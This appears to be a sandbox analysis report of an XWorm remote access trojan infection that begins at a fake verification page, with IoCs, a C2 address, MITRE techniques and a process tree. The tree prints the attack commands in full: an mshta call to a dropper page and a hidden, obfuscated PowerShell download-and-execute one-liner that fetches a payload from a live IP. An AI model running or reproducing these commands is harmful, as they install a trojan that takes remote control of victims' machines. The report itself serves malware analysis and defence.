xworm | hxxps://rewiewe-cheksdin[.]com/?__cf_chl_tk=0nE7XstTWtNOBCB9IQMqGid8fjmvUaoKVVXpiHS3BWY-1740668179-1[.]0[.]1[.]1-GnzoQ_xYIVs4SLz0xWsEytSBU4JtB_aR79Cj_4[.]FVW4

Analysis

max time kernel
300s
max time network
299s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
01/03/2025, 03:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://rewiewe-cheksdin.com/?__cf_chl_tk=0nE7XstTWtNOBCB9IQMqGid8fjmvUaoKVVXpiHS3BWY-1740668179-1.0.1.1-GnzoQ_xYIVs4SLz0xWsEytSBU4JtB_aR79Cj_4.FVW4

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://x10mrn-point.cfd/ie10DeqG41t7HBKs.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.211/a.mp4

Extracted

Family

xworm

Version

5.0

185.7.214.211:4444

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral3/files/0x000200000002732e-221.dat	family_xworm
behavioral3/memory/3100-222-0x0000021E03940000-0x0000021E03950000-memory.dmp	family_xworm
behavioral3/memory/4108-224-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
88	2820	mshta.exe
93	2820	mshta.exe
98	3100	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3100	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3100 set thread context of 4108	3100	powershell.exe	117

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133852751761622215"	chrome.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
1468	chrome.exe
1468	chrome.exe
2700	chrome.exe
2700	chrome.exe
2700	chrome.exe
2700	chrome.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe
Token: SeShutdownPrivilege	1468	chrome.exe
Token: SeCreatePagefilePrivilege	1468	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1468 wrote to memory of 1156	1468	chrome.exe	84
PID 1468 wrote to memory of 1156	1468	chrome.exe	84
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 3504	1468	chrome.exe	85
PID 1468 wrote to memory of 2620	1468	chrome.exe	86
PID 1468 wrote to memory of 2620	1468	chrome.exe	86
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87
PID 1468 wrote to memory of 1132	1468	chrome.exe	87

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://rewiewe-cheksdin.com/?__cf_chl_tk=0nE7XstTWtNOBCB9IQMqGid8fjmvUaoKVVXpiHS3BWY-1740668179-1.0.1.1-GnzoQ_xYIVs4SLz0xWsEytSBU4JtB_aR79Cj_4.FVW4
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff870f7cc40,0x7ff870f7cc4c,0x7ff870f7cc58
  2⤵
  PID:1156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1832 /prefetch:2
  2⤵
  PID:3504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2124,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2212 /prefetch:3
  2⤵
  PID:2620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2276 /prefetch:8
  2⤵
  PID:1132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:2716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:1664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4924,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4936 /prefetch:8
  2⤵
  PID:4136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4608,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4644,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4956 /prefetch:1
  2⤵
  PID:1380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4532,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4568 /prefetch:1
  2⤵
  PID:4392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5128,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4344 /prefetch:8
  2⤵
  PID:2184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5132,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5252 /prefetch:8
  2⤵
  PID:5092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5152,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  PID:3296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5160,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5572 /prefetch:8
  2⤵
  PID:3384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3332,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5324 /prefetch:1
  2⤵
  PID:3760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4736,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3836 /prefetch:1
  2⤵
  PID:1188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5076,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5352 /prefetch:1
  2⤵
  PID:3800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3172,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5092 /prefetch:8
  2⤵
  PID:1564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5448,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5548 /prefetch:8
  2⤵
  PID:3148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3212,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5884,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5896 /prefetch:8
  2⤵
  PID:2504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5876,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5920 /prefetch:8
  2⤵
  PID:448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6108,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6120 /prefetch:8
  2⤵
  PID:2284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5404,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5968 /prefetch:1
  2⤵
  PID:448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5364,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5208 /prefetch:1
  2⤵
  PID:5660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5340,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5272 /prefetch:8
  2⤵
  PID:5684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5356,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=840 /prefetch:1
  2⤵
  PID:5696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6068,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6020 /prefetch:8
  2⤵
  PID:5736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4404,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4616 /prefetch:8
  2⤵
  PID:5824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3148,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5164 /prefetch:8
  2⤵
  PID:5844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=4760,i,1443777848697521811,1199480510220373320,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6132 /prefetch:1
  2⤵
  PID:6048

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3524

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://x10mrn-point.cfd/ie10DeqG41t7HBKs.html #'' I'm human ID677835''
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:2820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$A1='ject Net.WebCli';$B2='loadString(''http://185.7.214.211/a.mp4'')';$C3='ent).Down';$D4='(New-Ob';$E5=IEX ($D4,$A1,$C3,$B2 -Join '')|IEX"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:3100
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vwi3zgzf\vwi3zgzf.cmdline"
    3⤵
    PID:2708
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA936.tmp" "c:\Users\Admin\AppData\Local\Temp\vwi3zgzf\CSC3166DAB42F874B0B81533851333F59B8.TMP"
      4⤵
      PID:3548
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4176
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4680
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4032
